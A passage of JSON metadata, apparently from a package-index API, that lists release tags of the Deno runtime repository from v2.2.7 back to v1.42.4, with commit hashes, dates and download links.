d/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/